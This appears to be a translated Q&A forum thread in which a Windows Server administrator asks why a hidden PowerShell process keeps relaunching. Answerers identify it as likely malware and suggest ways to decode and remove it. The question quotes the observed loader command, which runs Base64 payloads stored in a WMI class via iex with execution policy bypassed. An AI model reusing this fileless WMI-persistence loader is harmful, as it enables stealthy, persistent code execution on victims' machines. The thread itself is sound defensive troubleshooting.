Windows Server:如何找出PowerShell进程持续启动的原因及其作用?
我看到一个不断启动的PowerShell进程,我不知道为什么 根据Process Explorer,PowerShell进程如下所示:Windows Server:如何找出PowerShell进程持续启动的原因及其作用?,windows,powershell,server,Windows,Powershell,Server,我看到一个不断启动的PowerShell进程,我不知道为什么 根据Process Explorer,PowerShell进程如下所示: powershell -NoP -NonI -W Hidden -exec bypass "$am = ([WmiClass] 'root\default:systemcore_Updater8').Properties['am'].Value;$deam=[System.Text.Encoding]::ASCII.GetString([System.
powershell -NoP -NonI -W Hidden -exec bypass "$am = ([WmiClass] 'root\default:systemcore_Updater8').Properties['am'].Value;$deam=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($am));iex $deam;$co = ([WmiClass] 'root\default:systemcore_Updater8').Properties['enco'].Value;$deco=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($co));iex $deco"
从Base64字符串转换过来的东西在我看来很可疑,但除此之外,我无法解码(哈!)这里发生了什么
当我终止进程时,它会在某个时间重新启动(几分钟到半小时)
我在任务管理器中找不到任何似乎启动该过程的东西
我开始怀疑一些非常可疑的事情
有什么建议吗?不是答案,但不适合评论: 您可以执行以下命令来显示脚本正在调用什么(iex)
看起来确实是恶意代码。我会尝试使用MalwareBytesCheck删除它您的Scheduled Tasks集合,它很可能从那里开始(并解释它的功能)。
systemcore\u Updater8
不是我能找到的标准,代码基本上有两个属性,对Base64值进行解码,然后作为PowerShell脚本执行这两个属性,因此这可以用来执行任意代码。这并不一定意味着它是恶意的(Hanlon的Razor适用,它可能是一些官方的第三方软件,以一种迟钝的方式处理事情),但确实让它变得可疑。使用systemcore\u Updater8
,但我不清楚它是该类的源代码还是只是在使用它。但很有可能,这是来源。您可以指示Powershell全局记录它执行的所有操作,并获取实际调用的get。
$am = ([WmiClass] 'root\default:systemcore_Updater8').Properties['am'].Value;
$deam=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($am));
Write-Output $deam
$co = ([WmiClass] 'root\default:systemcore_Updater8').Properties['enco'].Value;
$deco=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($co));
Write-Output $deam